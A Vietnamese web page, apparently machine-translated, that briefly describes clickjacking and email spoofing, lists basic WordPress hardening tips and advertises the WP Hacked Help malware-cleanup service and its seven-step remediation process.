Clickjacking (hoặc “click-hijacking”) là một kỹ thuật độc hại. Trong kỹ thuật này, kẻ tấn công chiếm đoạt một nút, một liên kết hoặc một hình ảnh bằng cách chồng lên một liên kết (trong suốt hoặc mờ đục), biết rằng bạn sẽ nhấp vào liên kết đó. Mục tiêu của kiểu tấn công này là khiến bạn nhấp vào liên kết vô hình thay vì cho phép bạn nhấp vào đối tượng mong muốn của trang web

Do đó, kẻ tấn công có thể thực thi các lệnh nguy hiểm hoặc giành quyền truy cập vào thông tin bí mật. Người dùng Plesk có thể là nạn nhân của clickjacking khi Plesk được mở trong iframe trên các trang web độc hại

giả mạo

Bạn có nhận được một email kỳ lạ từ người thân (hoặc thậm chí là email từ chính bạn) không? . bạn chắc chắn là nạn nhân của sự giả mạo. Đây là một phương pháp giả mạo địa chỉ email gửi

Kiểu tấn công này rất phổ biến (và đôi khi đáng tin cậy). Thông thường, tin tặc cố gắng khiến bạn tin vào những điều thực sự hoàn toàn sai. anh ấy có thông tin về bạn, một người thân yêu cần bạn, v.v.

⭐Mẹo phòng chống hack WordPress

Để ngăn trang web của bạn khỏi bị lây nhiễm và có thể bảo vệ trang khỏi các kiểu tấn công này, bạn nên sử dụng các plugin và chủ đề có danh tiếng tốt. Có những giải pháp đã được thử nghiệm bởi người dùng của cộng đồng WordPress (tham khảo các bài đánh giá) và tương thích với chủ đề bạn đã chọn cho trang web của mình

Dọn dẹp một trang web WordPress bị tấn công có thể rất khó khăn và cần có sự can thiệp của chuyên gia. WPHackedHelp có thể giúp bạn kiểm tra các rủi ro bảo mật trên trang web của mình. Ví dụ: họ có thể tìm kiếm mã độc hại, liên kết đáng ngờ, chuyển hướng đáng ngờ, phiên bản WordPress, v.v.

Xem hướng dẫn chi tiết của chúng tôi về cách khắc phục trang web WordPress bị tấn công của bạn & Danh sách kiểm tra bảo mật WordPress 2022 – Hướng dẫn từng bước

Nhân tiện, việc WordPress là mục tiêu của tin tặc là điều bình thường. Vì người ta ước tính rằng khoảng một phần ba (35%) trang web hiện đang chạy WordPress

Tuy nhiên, có một vài bước bạn có thể thực hiện để bảo vệ bản thân khỏi những rủi ro tiềm ẩn. Dưới đây là một số điều được biết đến nhiều nhất và cơ bản nhất mà tôi chia sẻ với bạn

1. Thay đổi ID quản trị viên (Admin) mặc định khi cài đặt WordPress
2. Hạn chế quyền truy cập vào trang web của bạn – Chặn địa chỉ IP cho quản trị viên wordpress hoặc chỉ những địa chỉ ip trong danh sách trắng là chính hãng
3. Thực hiện nâng cấp WordPress của bạn ngay khi chúng có sẵn
4. Sử dụng phiên bản cập nhật tốt của PHP ( PHP. Bộ tiền xử lý siêu văn bản)
5. Sử dụng mật khẩu mạnh. Thay thế chữ hoa và chữ thường, số, v.v.
6. Chỉ lấy các mẫu ( chủ đề ) từ các nguồn đáng tin cậy và được đề xuất
7. Điều tương tự cũng xảy ra với các plugin. Tránh xa những người nghi ngờ và/hoặc những người không còn được hỗ trợ

Nếu WordPress cho thấy một plugin đã không được cập nhật trong nhiều năm, thì đó có thể là một lỗ hổng tiềm ẩn

1. Trước khi cài đặt một plugin, hãy nghiên cứu và tìm hiểu về độ tin cậy của nó
2. Vô hiệu hóa và gỡ cài đặt các plugin mà bạn không còn sử dụng nữa
3. Chỉ sử dụng nghiêm ngặt các plugin mà bạn thực sự cần
4. Sử dụng giao thức HTTPS an toàn thay vì HTTP
5. Quét trang web của bạn bằng trình quét như WP Hacked Help
6. Thực hiện sao lưu thường xuyên bằng một plugin đáng tin cậy (ví dụ:. Jetpack) hoặc phía máy chủ
7. Vô hiệu hóa tài khoản không hoạt động của nhân viên cũ đang truy cập trang web
8. Đừng để khách truy cập gửi bình luận mà không có sự chấp thuận của họ
9. Không cho upload file từ website
10. Tiếp tục theo dõi hoạt động của người dùng trên trang web của bạn hàng tuần

WordPress bị hack?

Nhóm trợ giúp WP Hacked sẵn sàng trợ giúp bạn. Đây là dịch vụ loại bỏ phần mềm độc hại wordpress được xếp hạng hàng đầu vào năm 2021

• Trang web WordPress của bạn chuyển hướng bạn đến các trang nghi vấn, đáng ngờ hoặc có khả năng gây nguy hiểm. bán thuốc, bán giấy phép CNTT, bán dịch vụ CNTT đáng ngờ, v.v.
• Nội dung không phù hợp hoặc lừa đảo đã được thêm vào trang, nội dung hoặc bài viết của bạn
• lỗi wordpress bắt đầu bật lên trên trang web của bạn
• Google cho bạn biết rằng trang web của bạn có thể chứa các chương trình độc hại (phần mềm độc hại) hoặc trang web của bạn đã bị tấn công
• Máy chủ của bạn cho bạn biết rằng một số thư được gửi từ địa chỉ email của bạn đã được xác định là email rác (thư rác)
• Nhà cung cấp dịch vụ lưu trữ của bạn đưa trang web của bạn ngoại tuyến vì nó bị tấn công
• Bạn nhận thấy lưu lượng truy cập vào trang web của mình giảm đột ngột
• Trang chủ của trang web của bạn bị hỏng
• Các tập tin và tập lệnh không xác định đã được ghép vào máy chủ của bạn
• Trang web của bạn thường chậm hoặc không phản hồi

Nếu trang web của bạn bị tấn công hoặc bị nhiễm vi-rút, điều đó có nghĩa là danh tiếng và dữ liệu của bạn đang gặp rủi ro. Điều quan trọng là không chờ đợi và khắc phục sự cố ngay bây giờ. Chúng tôi biết tầm quan trọng của trang web đối với doanh nghiệp của bạn và đó là lý do tại sao các chuyên gia của chúng tôi ở đây để giúp bạn khắc phục và khôi phục trang web wordpress bị tấn công một cách nhanh chóng

XÓA WORDPRESS HACKED – NHẬN GIẢM GIÁ ĐẶC BIỆT

Dịch vụ vệ sinh của bạn bao gồm những gì?

Dịch vụ dọn dẹp WP Hacked Help giúp ngăn chặn mối đe dọa để bạn có thể lấy lại quyền kiểm soát trang web và tài khoản lưu trữ của mình với sự tự tin rằng sự cố sẽ biến mất vĩnh viễn

Can thiệp nhanh chóng và hiệu quả

Chúng tôi lấy lại quyền kiểm soát trang web của bạn cho bạn và trả lại cho bạn trong tình trạng hoạt động hoàn hảo, được làm sạch và bảo mật. Vì bạn cần phản hồi nhanh chóng và hiệu quả, nhóm của chúng tôi sẽ dọn dẹp, bảo mật và đưa trang web của bạn hoạt động trở lại sau 48 giờ hoặc ít hơn. Làm sạch và bảo mật trang web WordPress của bạn là ưu tiên của chúng tôi

ưu tiên hỗ trợ

Vì lý do này, trong toàn bộ quá trình, bạn có thể liên hệ với chuyên gia bất cứ lúc nào nếu có bất kỳ câu hỏi nào liên quan đến bảo mật trang web của bạn

Chúng tôi đảm bảo chấm dứt thư rác SEO, cửa hậu ẩn, phần mềm độc hại và cảnh báo danh sách đen của google

Kế hoạch can thiệp và bảo mật của chúng tôi diễn ra trong 7 bước đơn giản

1. Chúng tôi di chuyển trang web của bạn sang một dịch vụ lưu trữ mới an toàn và hiệu quả. Một dịch vụ lưu trữ mới cung cấp khả năng bảo vệ và bảo mật tối ưu cho trang web của bạn
2. Quét toàn bộ trang web của bạn. Chúng tôi bắt đầu điều tra bằng việc quét toàn bộ WordPress của bạn. Điều này cho phép chúng tôi xác định vấn đề tại nguồn để giải quyết vấn đề tốt hơn. Chúng tôi quét toàn bộ trang web bằng các tập lệnh được phát triển nội bộ dành riêng cho WordPress
3. dọn dẹp trang web. Chúng tôi xóa các tệp gian lận và thông báo cho Google khi trang web của bạn tuân thủ. Việc làm sạch trang web của bạn kéo dài 24 giờ và 48 giờ
4. Triển khai các công cụ bảo mật và ngăn chặn các cuộc tấn công mới. Chúng tôi sẽ cài đặt và định cấu hình các công cụ bảo mật hiệu suất cao để giảm thiểu rủi ro xảy ra sự cố như vậy. Cách tiếp cận của chúng tôi nhằm mục đích phòng ngừa và không phản ứng
5. Các khuyến nghị để bảo mật trang web trong tương lai. Sau khi dọn dẹp trang web WordPress bị tấn công, chúng tôi cung cấp cho bạn các đề xuất để tăng cường bảo mật cho trang web của bạn trước vi-rút, phần mềm độc hại và các cuộc tấn công khác. Ngoài việc dọn dẹp trang web của bạn, mục tiêu chính của chúng tôi là ngăn chặn các cuộc tấn công mới của tin tặc và ngăn chặn các vi phạm bảo mật mới do phần mềm độc hại gây ra
6. Đặt lại và khôi phục trang web. Chúng tôi tự đưa trang web an toàn và hoạt động 100% của bạn trở lại trực tuyến
7. Dịch vụ bảo trì và bảo dưỡng. Khi trang web của bạn được làm sạch 100%, chúng tôi cung cấp các dịch vụ bảo trì và bảo trì để thường xuyên cung cấp các bản cập nhật, sao lưu và quét bảo mật cần thiết để trang web hoạt động bình thường và bảo mật. . Cuối cùng, chúng tôi cung cấp cho bạn dịch vụ theo dõi trong 12 tháng để ngăn chặn các cuộc tấn công

Chúng tôi đảm bảo rằng trang web WordPress của bạn được bảo mật một cách bền vững, vì nhóm của chúng tôi thực hiện các quy trình để tăng cường bảo mật

Làm cách nào để truy cập quản trị viên WordPress mà không cần mật khẩu?

Có thể hack trang web WordPress không?

Làm thế nào dễ dàng là nó để hack WordPress?

Tin tặc có thể bỏ qua mật khẩu?